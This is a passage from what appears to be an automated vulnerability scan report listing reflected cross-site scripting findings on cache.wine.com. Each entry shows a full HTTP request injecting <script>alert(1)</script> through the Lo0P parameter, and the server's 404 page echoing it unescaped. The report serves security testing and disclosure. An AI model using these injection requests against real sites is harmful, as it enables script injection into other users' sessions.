GET /images/css/HomeNavRtArrow.jpg?Lo0P=aced8<script>alert(1)</script>ddba18ef896 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 265
Date: Mon, 14 Feb 2011 17:16:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/css/HomeNavRtArrow.jpg?Lo0P=aced8<script>alert(1)</script>ddba18ef896 was not found on this server.<P>
...[SNIP]...

1.11. http://cache.wine.com/images/css/facebookIcon.png [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/css/facebookIcon.png

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 4ef06<script>alert(1)</script>e8f7327a8f7 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/css/facebookIcon.png?Lo0P=4ef06<script>alert(1)</script>e8f7327a8f7 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 263
Date: Mon, 14 Feb 2011 17:16:06 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/css/facebookIcon.png?Lo0P=4ef06<script>alert(1)</script>e8f7327a8f7 was not found on this server.<P>
...[SNIP]...

1.12. http://cache.wine.com/images/css/greyPlus.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/css/greyPlus.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 4c70a<script>alert(1)</script>49718bb4565 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/css/greyPlus.gif?Lo0P=4c70a<script>alert(1)</script>49718bb4565 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 259
Date: Mon, 14 Feb 2011 17:16:06 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/css/greyPlus.gif?Lo0P=4c70a<script>alert(1)</script>49718bb4565 was not found on this server.<P>
...[SNIP]...

1.13. http://cache.wine.com/images/css/iconWineMan.png [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/css/iconWineMan.png

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload f224b<script>alert(1)</script>8b190a1140 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/css/iconWineMan.png?Lo0P=f224b<script>alert(1)</script>8b190a1140 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 261
Date: Mon, 14 Feb 2011 17:16:06 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/css/iconWineMan.png?Lo0P=f224b<script>alert(1)</script>8b190a1140 was not found on this server.<P>
...[SNIP]...

1.14. http://cache.wine.com/images/glo_icon_bubbly_big.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/glo_icon_bubbly_big.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload da267<script>alert(1)</script>96597c1d1a3 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/glo_icon_bubbly_big.gif?Lo0P=da267<script>alert(1)</script>96597c1d1a3 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 266
Date: Mon, 14 Feb 2011 17:16:29 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/glo_icon_bubbly_big.gif?Lo0P=da267<script>alert(1)</script>96597c1d1a3 was not found on this server.<P>
...[SNIP]...

1.15. http://cache.wine.com/images/glo_icon_collectable_big.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/glo_icon_collectable_big.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload c581e<script>alert(1)</script>6840ce25c4e was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/glo_icon_collectable_big.gif?Lo0P=c581e<script>alert(1)</script>6840ce25c4e HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 271
Date: Mon, 14 Feb 2011 17:16:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/glo_icon_collectable_big.gif?Lo0P=c581e<script>alert(1)</script>6840ce25c4e was not found on this server.<P>
...[SNIP]...

1.16. http://cache.wine.com/images/glo_icon_gift_big.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/glo_icon_gift_big.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 44649<script>alert(1)</script>0c09d6efe7e was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/glo_icon_gift_big.gif?Lo0P=44649<script>alert(1)</script>0c09d6efe7e HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 264
Date: Mon, 14 Feb 2011 17:16:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/glo_icon_gift_big.gif?Lo0P=44649<script>alert(1)</script>0c09d6efe7e was not found on this server.<P>
...[SNIP]...

1.17. http://cache.wine.com/images/glo_icon_kosher_big.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/glo_icon_kosher_big.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 58648<script>alert(1)</script>2d2522bbc2a was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/glo_icon_kosher_big.gif?Lo0P=58648<script>alert(1)</script>2d2522bbc2a HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 266
Date: Mon, 14 Feb 2011 17:16:36 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/glo_icon_kosher_big.gif?Lo0P=58648<script>alert(1)</script>2d2522bbc2a was not found on this server.<P>
...[SNIP]...

1.18. http://cache.wine.com/images/glo_icon_red_big.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/glo_icon_red_big.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 15c6f<script>alert(1)</script>a5227658ddb was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/glo_icon_red_big.gif?Lo0P=15c6f<script>alert(1)</script>a5227658ddb HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 263
Date: Mon, 14 Feb 2011 17:16:32 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/glo_icon_red_big.gif?Lo0P=15c6f<script>alert(1)</script>a5227658ddb was not found on this server.<P>
...[SNIP]...

1.19. http://cache.wine.com/images/glo_icon_rose_big.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/glo_icon_rose_big.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload df5a8<script>alert(1)</script>fcb090da3f2 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/glo_icon_rose_big.gif?Lo0P=df5a8<script>alert(1)</script>fcb090da3f2 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 264
Date: Mon, 14 Feb 2011 17:16:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/glo_icon_rose_big.gif?Lo0P=df5a8<script>alert(1)</script>fcb090da3f2 was not found on this server.<P>
...[SNIP]...

1.20. http://cache.wine.com/images/glo_icon_video_big.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/glo_icon_video_big.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 6b333<script>alert(1)</script>518ce946ae8 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/glo_icon_video_big.gif?Lo0P=6b333<script>alert(1)</script>518ce946ae8 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 265
Date: Mon, 14 Feb 2011 17:16:36 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/glo_icon_video_big.gif?Lo0P=6b333<script>alert(1)</script>518ce946ae8 was not found on this server.<P>
...[SNIP]...

1.21. http://cache.wine.com/images/glo_icon_white_big.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/glo_icon_white_big.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload b6e80<script>alert(1)</script>c7eb9779310 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/glo_icon_white_big.gif?Lo0P=b6e80<script>alert(1)</script>c7eb9779310 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 265
Date: Mon, 14 Feb 2011 17:16:27 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/glo_icon_white_big.gif?Lo0P=b6e80<script>alert(1)</script>c7eb9779310 was not found on this server.<P>
...[SNIP]...

1.22. http://cache.wine.com/images/rating90.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/rating90.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 58bf6<script>alert(1)</script>66ff2140e18 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/rating90.gif?Lo0P=58bf6<script>alert(1)</script>66ff2140e18 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 255
Date: Mon, 14 Feb 2011 17:16:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/rating90.gif?Lo0P=58bf6<script>alert(1)</script>66ff2140e18 was not found on this server.<P>
...[SNIP]...

1.23. http://cache.wine.com/images/rating91.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/rating91.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 122b3<script>alert(1)</script>a2c714fb695 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/rating91.gif?Lo0P=122b3<script>alert(1)</script>a2c714fb695 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 255
Date: Mon, 14 Feb 2011 17:16:28 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/rating91.gif?Lo0P=122b3<script>alert(1)</script>a2c714fb695 was not found on this server.<P>
...[SNIP]...

1.24. http://cache.wine.com/images/rating94.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/rating94.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload f838d<script>alert(1)</script>333dce6039d was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/rating94.gif?Lo0P=f838d<script>alert(1)</script>333dce6039d HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 255
Date: Mon, 14 Feb 2011 17:16:28 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/rating94.gif?Lo0P=f838d<script>alert(1)</script>333dce6039d was not found on this server.<P>
...[SNIP]...

1.25. http://cache.wine.com/images/ratingBH.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/ratingBH.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 22234<script>alert(1)</script>34ff4f92558 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/ratingBH.gif?Lo0P=22234<script>alert(1)</script>34ff4f92558 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 255
Date: Mon, 14 Feb 2011 17:16:47 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/ratingBH.gif?Lo0P=22234<script>alert(1)</script>34ff4f92558 was not found on this server.<P>
...[SNIP]...

1.26. http://cache.wine.com/images/ratingCG.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/ratingCG.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 70095<script>alert(1)</script>d0259add5c3 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/ratingCG.gif?Lo0P=70095<script>alert(1)</script>d0259add5c3 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
